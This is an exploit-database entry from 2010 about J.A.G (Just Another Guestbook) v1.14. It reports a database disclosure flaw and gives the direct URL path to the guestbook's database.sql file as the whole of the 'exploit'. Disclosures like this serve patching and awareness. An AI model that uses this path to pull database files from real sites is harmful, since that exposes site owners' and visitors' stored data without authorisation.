id: 10848
date: 02/11/2010
title: J.A.G (Just Another Guestbook) Database Disclosure Vulnerability
author: Phenom
cves: 

================================================================
J.A.G (Just Another Guestbook) Database Disclosure Vulnerability
================================================================

# Software Link: http://www.xs4all.nl/~crisp/jag/jag.zip
# Version: v1.14
# Tested on: Windows xp sp3
  
 
------------------------------------------------------
 
####### J.A.G (Just Another Guestbook) Database Disclosure Vulnerability #######
#
#       Author : Phenom
#
#       app version : 1.14
#
#################################################################################
 
####### Exploit #################################################################
#
#     http://site.com/path/jag/database.sql
#
#################################################################################



#  0day.today [2023-03-26]  #